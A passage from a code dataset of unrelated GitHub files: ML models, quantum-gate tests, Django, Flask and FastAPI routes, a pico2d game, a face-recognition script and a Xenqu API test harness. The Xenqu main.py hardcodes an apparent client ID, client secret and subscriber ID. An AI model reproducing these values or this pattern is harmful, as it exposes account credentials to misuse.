1)\n t = dataset.t.reshape(-1, 1)\n err0 = mean_squared_error(y[t == 0], mu0[t == 0])\n err1 = mean_squared_error(y[t == 1], mu1[t == 1])\n err = err0 + err1\n if err < best_err:\n best_err = err\n best_h = h\n count = 0\n elif count < 20:\n count += 1\n else:\n break\n if self.verbose:\n print(f\"h-{h:.03f}_err-{err:.03f}\")\n self.kernel.length_scale = best_h\n\n def embed(self, x):\n return x","repo_name":"CausalML/BLearner","sub_path":"models/kernel/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1029222068","text":"import numpy as np\r\nimport tflearn\r\nfrom tflearn.data_preprocessing import ImagePreprocessing\r\nfrom tflearn.data_augmentation import ImageAugmentation\r\nfrom tflearn.layers.core import input_data, dropout, fully_connected\r\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\r\nfrom tflearn.layers.estimator import regression\r\n\r\n# 训练与测试时数据实时预处理\r\nimg_pre = ImagePreprocessing()\r\n# 均值归零\r\nimg_pre.add_featurewise_zero_center()\r\n# 标准差归一 \r\nimg_pre.add_featurewise_stdnorm()\r\n\r\n# 训练时数据实时增强\r\nimg_aug = ImageAugmentation()\r\n# 左右翻转\r\nimg_aug.add_random_flip_leftright()\r\n# 随机旋转\r\nimg_aug.add_random_rotation(max_angle=25.)\r\n\r\n# CNN模型\r\n# 3个是卷积层、2个最大池化层、2个全连接层\r\n# 输入 batch*32*32*3\r\nnetwork = input_data(shape=[None, 32, 32, 3], data_preprocessing=img_pre, data_augmentation=img_aug)\r\n# 卷积层1:32个卷积核,尺寸3*3*3*32,激活函数ReLU\r\nnetwork = conv_2d(network, 32, 3, activation='relu')\r\n# 最大池化层1:核同conv,步幅strides=2\r\nnetwork = max_pool_2d(network, 2)\r\n# 卷积层2:64个卷积核\r\nnetwork = conv_2d(network, 64, 3, activation='relu')\r\n# 卷积层3\r\nnetwork = conv_2d(network, 64, 3, activation='relu')\r\n# 最大池化层2\r\nnetwork = max_pool_2d(network, 2)\r\n# 全连接层1:512个神经元\r\nnetwork = fully_connected(network, 512, activation='relu')\r\n # dropout:50%保留\r\nnetwork = dropout(network, 0.5)\r\n# 全连接层2:10个神经元和Softmax激活函数\r\nnetwork = fully_connected(network, 10, activation='softmax')\r\n # 参数优化:Adam,损失函数:交叉熵,学习率:0.001\r\nnetwork = regression(network, optimizer='adam', loss='categorical_crossentropy', learning_rate=0.001)\r\n# Tensorboard可视化\r\n# 0: Loss, Accuracy (Best Speed).\r\n# 1: Loss, Accuracy, Gradients.\r\n# 2: Loss, Accuracy, Gradients, Weights.\r\n# 3: Loss, Accuracy, Gradients, Weights, Activations, Sparsity.\r\nmodel = tflearn.DNN(network, tensorboard_verbose=1,tensorboard_dir='tflearn_logs/')\r\n","repo_name":"isjjhang/A-Simple-Image-Classification-based-on-CNN","sub_path":"CNN_Model.py","file_name":"CNN_Model.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33129914732","text":"import cmath\nimport copy\n\nimport numpy\nimport pytest\n\nfrom divya import MainEngine\nfrom divya.cengines import DummyEngine\nfrom divya.ops import BasicGate, NotMergeable, Ph, QubitOperator\nfrom divya.ops import _time_evolution as te\n\n@pytest.mark.parametrize(\"coefficient\", [0.5, numpy.float64(2.303)])\ndef test_time_evolution_init_int_time(coefficient):\n hamiltonian = coefficient * QubitOperator(\"X0 Z1\")\n hamiltonian += QubitOperator(\"Z2\", 0.5)\n gate1 = te.TimeEvolution(2, hamiltonian)\n assert gate1.hamiltonian.isclose(hamiltonian)\n assert gate1.time == 2\n\n@pytest.mark.parametrize(\"coefficient\", [0.5, numpy.float64(2.303)])\ndef test_init_float_time(coefficient):\n hamiltonian = coefficient * QubitOperator(\"X0 Z1\")\n hamiltonian += QubitOperator(\"Z2\", 0.5)\n gate2 = te.TimeEvolution(2.1, hamiltonian)\n assert gate2.hamiltonian.isclose(hamiltonian)\n assert gate2.time == pytest.approx(2.1)\n\ndef test_init_makes_copy():\n hamiltonian = QubitOperator(\"X0 Z1\")\n gate = te.TimeEvolution(2.1, hamiltonian)\n hamiltonian = None\n assert gate.hamiltonian is not None\n\ndef test_init_bad_time():\n hamiltonian = QubitOperator(\"Z2\", 0.5)\n with pytest.raises(TypeError):\n te.TimeEvolution(1.5j, hamiltonian)\n\ndef test_init_bad_hamiltonian():\n with pytest.raises(TypeError):\n te.TimeEvolution(2, \"something else\")\n\ndef test_init_not_hermitian():\n hamiltonian = QubitOperator(\"Z2\", 1e-12j)\n with pytest.raises(te.NotHermitianOperatorError):\n te.TimeEvolution(1, hamiltonian)\n\ndef test_init_cast_complex_to_float():\n hamiltonian = QubitOperator(\"Z2\", 2 + 0j)\n gate = te.TimeEvolution(1, hamiltonian)\n assert isinstance(gate.hamiltonian.terms[((2, 'Z'),)], float)\n pytest.approx(gate.hamiltonian.terms[((2, 'Z'),)]) == 2.0\n\ndef test_init_negative_time():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(-1, hamiltonian)\n assert gate.time == -1\n\ndef test_get_inverse():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n inverse = gate.get_inverse()\n assert gate.time == 2\n assert gate.hamiltonian.isclose(hamiltonian)\n assert inverse.time == -2\n assert inverse.hamiltonian.isclose(hamiltonian)\n\ndef test_get_merged_one_term():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n merged = gate.get_merged(gate2)\n # This is not a requirement, the hamiltonian could also be the other\n # if we change implementation\n assert merged.hamiltonian.isclose(hamiltonian)\n assert merged.time == pytest.approx(12)\n\ndef test_get_merged_multiple_terms():\n hamiltonian = QubitOperator(\"Z2\", 2)\n hamiltonian += QubitOperator(\"X3\", 1)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n hamiltonian2 += QubitOperator(\"X3\", 2 + 1e-10)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n merged = gate.get_merged(gate2)\n # This is not a requirement, the hamiltonian could also be the other\n # if we change implementation\n assert merged.hamiltonian.isclose(hamiltonian)\n assert merged.time == pytest.approx(12)\n\ndef test_get_merged_not_close_enough():\n hamiltonian = QubitOperator(\"Z2\", 2)\n hamiltonian += QubitOperator(\"X3\", 1)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Z2\", 4)\n hamiltonian2 += QubitOperator(\"X3\", 2 + 1e-8)\n gate2 = te.TimeEvolution(5, hamiltonian2)\n with pytest.raises(NotMergeable):\n gate.get_merged(gate2)\n\ndef test_get_merged_bad_gate():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n other = BasicGate()\n with pytest.raises(NotMergeable):\n gate.get_merged(other)\n\ndef test_get_merged_different_hamiltonian():\n hamiltonian = QubitOperator(\"Z2\", 2)\n gate = te.TimeEvolution(2, hamiltonian)\n hamiltonian2 = QubitOperator(\"Y2\", 2)\n gate2 = te.TimeEvolution(2, hamiltonian2)\n with pytest.raises(NotMergeable):\n gate.get_merged(gate2)\n\ndef test_or_one_qubit():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qubit = eng.allocate_qubit()\n hamiltonian = QubitOperator(\"Z0\", 2)\n te.TimeEvolution(2.1, hamiltonian) | qubit[0]\n te.TimeEvolution(3, hamiltonian) | (qubit[0],)\n eng.flush()\n cmd1 = saving_backend.received_commands[1]\n assert cmd1.gate.hamiltonian.isclose(hamiltonian)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 1\n assert cmd1.qubits[0][0].id == qubit[0].id\n cmd2 = saving_backend.received_commands[2]\n assert cmd2.gate.hamiltonian.isclose(hamiltonian)\n assert cmd2.gate.time == pytest.approx(3)\n assert len(cmd2.qubits) == 1 and len(cmd2.qubits[0]) == 1\n assert cmd2.qubits[0][0].id == qubit[0].id\n\ndef test_or_one_qureg():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(5)\n hamiltonian = QubitOperator(\"X0 Z4\", 2)\n te.TimeEvolution(2.1, hamiltonian) | qureg\n te.TimeEvolution(3, hamiltonian) | (qureg,)\n eng.flush()\n rescaled_h = QubitOperator(\"X0 Z1\", 2)\n cmd1 = saving_backend.received_commands[5]\n assert cmd1.gate.hamiltonian.isclose(rescaled_h)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 2\n assert cmd1.qubits[0][0].id == qureg[0].id\n assert cmd1.qubits[0][1].id == qureg[4].id\n cmd2 = saving_backend.received_commands[6]\n assert cmd2.gate.hamiltonian.isclose(rescaled_h)\n assert cmd2.gate.time == pytest.approx(3)\n assert len(cmd2.qubits) == 1 and len(cmd2.qubits[0]) == 2\n assert cmd2.qubits[0][0].id == qureg[0].id\n assert cmd2.qubits[0][1].id == qureg[4].id\n\ndef test_or_two_qubits_error():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0\", 2)\n with pytest.raises(TypeError):\n te.TimeEvolution(2.1, hamiltonian) | (qureg[0], qureg[1])\n\ndef test_or_two_quregs_error():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n qureg2 = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0\", 2)\n with pytest.raises(TypeError):\n te.TimeEvolution(2.1, hamiltonian) | (qureg, qureg2)\n\ndef test_or_not_enough_qubits():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(2)\n hamiltonian = QubitOperator(\"Z0 X3\", 2)\n with pytest.raises(ValueError):\n te.TimeEvolution(2.1, hamiltonian) | qureg\n\ndef test_or_multiple_terms():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator(\"X0 Z3\", 2)\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n te.TimeEvolution(2.1, hamiltonian) | qureg\n eng.flush()\n rescaled_h = QubitOperator(\"X0 Z2\", 2)\n rescaled_h += QubitOperator(\"Y1\", 0.5)\n cmd1 = saving_backend.received_commands[4]\n assert cmd1.gate.hamiltonian.isclose(rescaled_h)\n assert cmd1.gate.time == pytest.approx(2.1)\n assert len(cmd1.qubits) == 1 and len(cmd1.qubits[0]) == 3\n assert cmd1.qubits[0][0].id == qureg[0].id\n assert cmd1.qubits[0][1].id == qureg[1].id\n assert cmd1.qubits[0][2].id == qureg[3].id\n\ndef test_or_gate_not_mutated():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator(\"X0 Z3\", 2)\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n correct_h = copy.deepcopy(hamiltonian)\n gate = te.TimeEvolution(2.1, hamiltonian)\n gate | qureg\n eng.flush()\n assert gate.hamiltonian.isclose(correct_h)\n assert gate.time == pytest.approx(2.1)\n\ndef test_or_gate_identity():\n saving_backend = DummyEngine(save_commands=True)\n eng = MainEngine(backend=saving_backend, engine_list=[])\n qureg = eng.allocate_qureg(4)\n hamiltonian = QubitOperator((), 3.4)\n correct_h = copy.deepcopy(hamiltonian) # noqa: F841\n gate = te.TimeEvolution(2.1, hamiltonian)\n gate | qureg\n eng.flush()\n cmd = saving_backend.received_commands[4]\n assert isinstance(cmd.gate, Ph)\n assert cmd.gate == Ph(-3.4 * 2.1)\n correct = numpy.array([[cmath.exp(-1j * 3.4 * 2.1), 0], [0, cmath.exp(-1j * 3.4 * 2.1)]])\n print(correct)\n print(cmd.gate.matrix)\n assert numpy.allclose(cmd.gate.matrix, correct)\n\ndef test_eq_not_implemented():\n hamiltonian = QubitOperator(\"X0 Z1\")\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert gate.__eq__(\"0\") == NotImplemented\n\ndef test_ne_not_implemented():\n hamiltonian = QubitOperator(\"X0 Z1\")\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert gate.__ne__(\"0\") == NotImplemented\n\ndef test_str():\n hamiltonian = QubitOperator(\"X0 Z1\")\n hamiltonian += QubitOperator(\"Y1\", 0.5)\n gate = te.TimeEvolution(2.1, hamiltonian)\n assert str(gate) == \"exp(-2.1j * (0.5 Y1 +\\n1.0 X0 Z1))\" or str(gate) == \"exp(-2.1j * (1.0 X0 Z1 +\\n0.5 Y1))\"","repo_name":"bhojpur/quantum","sub_path":"pkg/divya/ops/_time_evolution_test.py","file_name":"_time_evolution_test.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33556871529","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n # this view .asView() will actually be implemented as a class.\n # Inheriting from an existing generic view function\n # that already does most of what we want this view function to do,\n # rather than writing our own from scratch.\n path('books/', views.BookListView.as_view(), name='books'),\n path('book/', views.BookDetailView.as_view(), name='book-detail'),\n path('authors/', views.AuthorListView.as_view(), name='authors'),\n path('author/', views.AuthorDetailView.as_view(), name='author-detail'),\n\n]","repo_name":"agomezmartin/LocalLibraryDjango","sub_path":"locallibrary/catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70655219345","text":"from flask import Flask, request, redirect, render_template\nfrom os import urandom\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = str(urandom(24));\n\n@app.route('/')\ndef index():\n\treturn render_template(\"index.html\")\n\n@app.route('/greeting', methods = [\"POST\"])\ndef greeting():\n\tPOST_name = request.form[\"name\"]\n\treturn render_template(\"greeting.html\", name = POST_name)\n\nif __name__ == '__main__':\n\tapp.run(debug = True)\n","repo_name":"fossasia/Flask_Simple_Form","sub_path":"Spadi0/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1465,"dataset":"github-code","pt":"48"} +{"seq_id":"17847895611","text":"from fastapi import APIRouter\n\nimport models\nfrom core.exceptions import DatabaseItemNotFound\n\nrouter = APIRouter(prefix=\"/buildings\")\n\n\n@router.get(\"/\", response_model_by_alias=False)\ndef get_buildings() -> list[models.Building]:\n \"\"\"Get all buildings\"\"\"\n\n buildings = models.Building.find_all().to_list()\n return buildings\n\n\n@router.post(\"/\", status_code=201, response_model_by_alias=False)\ndef create_building(building: models.Building) -> models.Building:\n \"\"\"Create a new building\"\"\"\n\n building.create()\n\n return building\n\n\n@router.put(\"/{uid}\", response_model_by_alias=False)\ndef update_building(uid: str, changes: models.UpdateBuilding) -> models.Building:\n \"\"\"Update a Building with new values\"\"\"\n\n building = models.Building.get(uid).run()\n if not building:\n raise DatabaseItemNotFound(f\"Could not find Building with id: {uid}\")\n\n for key, value in changes.dict(exclude_unset=True).items():\n setattr(building, key, value)\n building.save()\n\n return building\n\n\n@router.delete(\"/{uid}\")\ndef delete_building(uid: str) -> str:\n \"\"\"Delete a Building\"\"\"\n\n building = models.Building.get(uid).run()\n if not building:\n raise DatabaseItemNotFound(f\"Could not find Building with id: {uid}\")\n building.delete()\n\n return uid\n","repo_name":"ocni-dtu/fastapi-tutorial","sub_path":"src/routes/building.py","file_name":"building.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4652802702","text":"#시간초과! 답 찾아봄 \nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n score = list(map(int, input().split()))\n case = [0] * (sum(score)+1)\n case[0] = 1\n res = [0]\n for s in score:\n for i in range(len(res)):\n if not case[s+res[i]]:\n case[s+res[i]] = 1\n res.append(s+res[i])\n print(f'#{tc} {len(res)}')\n ","repo_name":"Amyhds/codingtest","sub_path":"SWEA/D4/3752. 가능한 시험 점수/가능한 시험 점수.py","file_name":"가능한 시험 점수.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23788034247","text":"from pico2d import*\nimport random\nimport game_framework\nimport start_state\nimport main_state\nimport title_state\n\nBOY_SPEED = 20.0 #보이의 속도 조절\nMAX_ANIMATION_TIME = 0.1 #0.1초마다 애니메이션프레임을 증가시킨다. 애니메이션 프레임속도 조절\n\nAnimation_time =0\ncurrent_time = get_time()\n\nclass Grass:\n def __init__(self):\n self.image = load_image('grass.png')\n def draw(self):\n self.image.draw(400, 30)\n\nclass Boy:\n PIXEL_PER_METER = (10.0/0.3)\n RUN_SPEED_KMPH = BOY_SPEED\n RUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0 / 60.0)\n RUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\n RUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\n image = None\n\n LEFT_RUN, RIGHT_RUN, LEFT_STAND, RIGHT_STAND = 0,1,2,3\n stand_frames, run_frames =0,0\n def __init__(self):\n self.x, self.y = random.randint(100, 700), random.randint(50,550)\n self.frame = random.randint(0,7)\n self.dir =-1\n self.state = 0\n self.total_frames =0\n if Boy.image == None :\n Boy.image = load_image('인디아나존스실사그자체.png')\n\n\n\n\n\n def update(self):\n global current_time, Animation_time\n frame_time = get_time() - current_time\n frame_rate = 1.0 / frame_time\n Animation_time += frame_time\n print(\"Frame Rate: %f fps, Frame Time : %f sec, Animation_Time : %f \" % (frame_rate, frame_time, Animation_time))\n\n distance = Boy.RUN_SPEED_PPS* frame_time\n self.total_frames += 1.0\n if Animation_time> MAX_ANIMATION_TIME:\n self.frame = (self.frame +1)%7 #현재는 프레임마다 애니메이션이 바뀐다. => 이를 일정시간지나면 바뀌게 해야함.\n Animation_time = 0\n self.x += (self.dir*distance)\n\n if self.x>800:\n self.dir = -1\n self.x =800\n self.state = self.LEFT_RUN\n print(\"Change Time: %f, Total Frames : %d\" %(get_time(), self.total_frames))\n if self.x < 0:\n self.dir = 1\n self.x = 0\n self.state = self.RIGHT_RUN\n print(\"Change Time: %f, Total Frames : %d\" %(get_time(), self.total_frames))\n current_time += frame_time\n\n\n \n def draw(self):\n self.image.clip_draw(self.frame*30,0, 30, 48, self.x, self.y)\n\n \n \ndef enter():\n global boy, grass, team\n grass = Grass()\n boy = Boy()\n\n\n\n\ndef exit():\n global boy, grass\n del(boy)\n del(grass)\n\ndef handle_events():\n global select_num, RKC, LKC\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n game_framework.quit()\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n game_framework.change_state(title_state)\n\n\ndef update():\n boy.update()\n # delay(0.01)\n\n\n\n\ndef draw():\n clear_canvas()\n grass.draw()\n boy.draw()\n update_canvas()\n\n\n\n","repo_name":"YounSup/2DGAME_GIT","sub_path":"과제/main_state.py","file_name":"main_state.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9713203886","text":"\nimport json\nimport time\nimport base64\nfrom typing import Literal\nfrom reportlab.pdfgen.canvas import Canvas\nfrom testing import account, contact, reports, forms\nfrom testing.tracking import tabs, records, queues, items\nfrom xenqu.models import Address, Contact\nfrom xenqu import XenquAPI\n\nclient_id = \"WKKXPxwS0UqGy0199MMA\"\nclient_secret = \"7BvzE387BoQOWWTOpQMLI8C88xhE9FkwQCCN2ZosBdw\"\nprivate_key = open('./privatekey.pem', 'rb').read()\nsubscriber = \"5f3ed190c32e5f000186bb76\"\n\napi = XenquAPI(clientId=client_id, clientSecret=client_secret, pemPrivateKey=private_key, subscriber=subscriber, baseUrl='https://stage.xenqu.com')\n\n##? Account Routes Testing\ndef accountTesting():\n print('~~ Account ~~')\n return (\n # '~~ Account ~~\\n' +\n account.main(api=api) +\n '\\n'\n )\n\n##? Contact Routes Testing\ndef contactTesting():\n print('~~ Contact ~~')\n return (\n # '~~ Contact ~~\\n' + \n contact.main(api=api) + \n '\\n'\n )\n\n##? [Tracking] -|- Tab\ndef trackingTabTesting():\n print('~~ [Tracking] | Tab ~~')\n return (\n # '~~ [Tracking] | Tab ~~\\n' + \n tabs.main(api=api) + \n '\\n'\n )\n\n##? [Tracking] -|- Records\ndef trackingRecordTesting():\n print('~~ [Tracking] | Record ~~')\n return (\n records.main(api=api) + \n '\\n'\n )\n\n##? [Tracking] -|- Queue\ndef trackingQueueTesting():\n print('~~ [Tracking] | Queue ~~')\n return (\n queues.main(api=api) + \n '\\n'\n )\n\n##? [Tracking] -|- Item\ndef trackingItemTesting():\n print('~~ [Tracking] | Item ~~')\n return (\n items.main(api=api) + \n '\\n'\n )\n\n##? Form Routes Testing\ndef formTesting():\n print('~~ Form ~~')\n return (\n forms.main(api=api) + \n '\\n'\n )\n\n##? Report Routes Testing\ndef reportTesting():\n print('~~ Report ~~')\n return (\n reports.main(api=api) + \n '\\n'\n )\n\ndef generatePDFTesting(instanceId: int):\n pdfId = json.loads(api.forms.getInstance(instanceId=instanceId))[\"definition\"][\"pdf_id\"]\n api.forms.generatePdf(instanceId=instanceId, signPdf=True, addInfoFooter=True)\n time.sleep(5.0)\n newPdfId = json.loads(api.forms.getInstance(instanceId=instanceId))[\"definition\"][\"pdf_id\"]\n\n if (pdfId == newPdfId):\n return \"Polling time was not long enough :/\"\n \n tempHandleId = json.loads(api.forms.getFormFile(instanceId=instanceId, filesId=newPdfId))[\"_temp_handle_id\"]\n file = api.files.download(tempHandleId=tempHandleId)\n pdf_path = './out.pdf'\n pdf_file = Canvas(pdf_path)\n with open(pdf_path, 'wb') as f:\n f.write(file)\n\ndef uploadFileTesting(fileBytes: bytes, fileType: Literal['pdf', 'jpeg', 'txt', 'png'] = 'pdf'):\n l = len(fileBytes)\n encoded_string = base64.b64encode(fileBytes).decode('utf-8')\n if fileType == 'pdf':\n r = api.files.upload(chunkData=f\"data:appication/pdf;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n elif fileType == 'txt':\n r = api.files.upload(chunkData=f\"data:text/plain;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n elif fileType == 'png':\n r = api.files.upload(chunkData=f\"data:image/png;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n else:\n r = api.files.upload(chunkData=f\"data:image/jpeg;base64,{encoded_string}\", chunkSeq=0, chunkStart=0, chunkEnd=l, chunkLimit=l, chunkSize=l, totalSize=l, totalChunks=1)\n\n with open('./encoded.txt', 'w+') as f:\n f.write(encoded_string)\n return r\n\ndef downloadAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = data[\"files\"][0][\"files_id\"]\n tempHandleId = json.loads(api.tracking.items.getDownloadAttachment(attachmentId=attachmentId, filesId=filesId))[\"_temp_handle_id\"]\n file_bytes = api.files.download(tempHandleId=tempHandleId)\n with open('out.jpg', 'wb') as f:\n f.write(file_bytes)\n\ndef addAttachmentTesting(trackingId: int, contentType: str, fileName: str):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n with open('./text.txt', 'rb') as f:\n fileBytes = f.read()\n tempHandleId = json.loads(uploadFileTesting(fileBytes=fileBytes, fileType='txt'))[\"fileHandle\"]\n r = api.tracking.items.addAttachment(trackingId=trackingId, tempHandleId=tempHandleId, attachmentId=attachmentId, contentType='text/plain', fileName='text.txt', order=0, filesId=None)\n return r\n\ndef addJpg(trackingId: int, fileName: str):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n with open(fileName, 'rb') as f:\n fileBytes = f.read()\n tempHandleId = json.loads(uploadFileTesting(fileBytes=fileBytes, fileType='jpeg'))[\"fileHandle\"]\n r = api.tracking.items.addAttachment(trackingId=trackingId, tempHandleId=tempHandleId, attachmentId=attachmentId, contentType='image/jpeg', fileName=fileName, order=0, filesId=None)\n return r\n\n \ndef updateAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = data[\"files\"][0][\"files_id\"]\n tempHandleId = json.loads(uploadFileTesting(open('./pic.jpg', 'rb').read(), fileType='jpeg'))[\"fileHandle\"]\n r = api.tracking.items.updateAttachment(trackingId=trackingId, attachmentId=attachmentId, filesId=filesId, contentType='image/jpeg', fileName='pic.jpg', order=0, tempHandleId=tempHandleId)\n return r\n\ndef deleteAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = data[\"files\"][0][\"files_id\"]\n r = api.tracking.items.deleteAttachment(attachmentId=attachmentId, filesId=filesId)\n return r\n\n\nif __name__ == \"__main__\":\n # with open('./out.pdf', 'rb') as f:\n # print(uploadFileTesting(fileBytes=f.read()))\n\n with open('./out.json', 'w+') as f:\n # f.write(contactTesting())\n # f.write(trackingTabTesting())\n # f.write(trackingRecordTesting())\n # f.write(trackingQueueTesting())\n f.write(trackingItemTesting())\n # f.write(formTesting())\n # f.write(reportTesting())\n\n # generatePDFTesting(instanceId=8415)\n\n # downloadAttachmentTesting(trackingId=13052)\n\n # print(addAttachmentTesting(trackingId=13052))\n # print(addJpg(trackingId=13052, fileName='pic.jpg'))\n\n # print(updateAttachmentTesting(trackingId=13052))\n\n # print(deleteAttachmentTesting(trackingId=13052))\n\n pass\n","repo_name":"EssiumLLC/lib-xenqu-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73206397267","text":"import face_recognition\nimport argparse\nimport pickle\nimport cv2\nimport os\nimport sys\nimport csv\nimport numpy as np\n\nif os.path.exists(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\"):\n os.remove(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\")\nelse:\n pass\n\n# input_qvision = sys.argv[1]\n# input_qvision = \"1\"\n# example = \" \"\n# if input_qvision == \"1\":\ncap = cv2.VideoCapture(0)\nfor i in range(1):\n\treturn_value, image = cap.read()\n\tcv2.imwrite(\"/home/biped/catkin_ws/src/jacob/scripts/face_recog/examples/face_recog.png\", image)\ndel(cap)\n\ndata = pickle.loads(open(\"/home/biped/catkin_ws/src/jacob/scripts/face_recog/encodings.pickle\", \"rb\").read())\n\nrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\nboxes = face_recognition.face_locations(rgb, model=\"hog\")\nencodings = face_recognition.face_encodings(rgb, boxes)\n\nnames = []\n\nfor encoding in encodings:\n matches = face_recognition.compare_faces(data[\"encodings\"], encoding)\n name = \"Unknown\"\n\n if True in matches:\n matchedIdxs = [i for (i, b) in enumerate(matches) if b]\n counts = {}\n for i in matchedIdxs:\n name = data[\"names\"][i] \n counts[name] = counts.get(name, 0) + 1\n name = max(counts, key=counts.get)\n names.append(name)\nif len(names) < 1:\n names.append(\"nobody around\")\nprint(names)\nfor ((top, right, bottom, left), name) in zip(boxes, names):\n cv2.rectangle(image, (left, top), (right, bottom), (0, 255, 0), 2)\n y = top - 15 if top - 15 > 15 else top + 15\n cv2.putText(image, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\ncv2.imshow(\"Image\", image)\ncv2.waitKey(0)\n# print(\"done_face_recog\")\nident_result = open(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\", \"w\")\nwriter = csv.writer(ident_result)\nwriter.writerow(names)\nident_result.close()\n\n","repo_name":"JacobViertel/Biped","sub_path":"scripts/face_recog/recognize_faces_image.py","file_name":"recognize_faces_image.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11195439469","text":"#!/usr/bin/env python3\nimport os.path\nimport sys\nimport re\nimport random\nimport subprocess\nimport argparse\nimport pandas as pd\nimport mingus.core.keys as keys\nimport mingus.core.intervals as intervals\nfrom mingus.containers import Note\nfrom mingus.containers import Bar\nfrom mingus.midi import fluidsynth\nfrom mingus.extra import lilypond\n\n##### IMPORTANT INFO ABOUT MINGUS #####\n#\n# In order for this to work properly, I had to modify a few\n# files in the mingus package. If you have to reinstall or\n# update the environment, you will need to change these things:\n#\n# mingus/midi/fluidsynth.py:\n# Change line 126 from:\n# if not initialized:\n# to:\n# if initialized or not initialized:\n#\n# mingus/extras/lilypond.py:\n# Change line 252 from:\n# command = 'lilypond %s -o \"%s\" \"%s.ly\"' % (command, 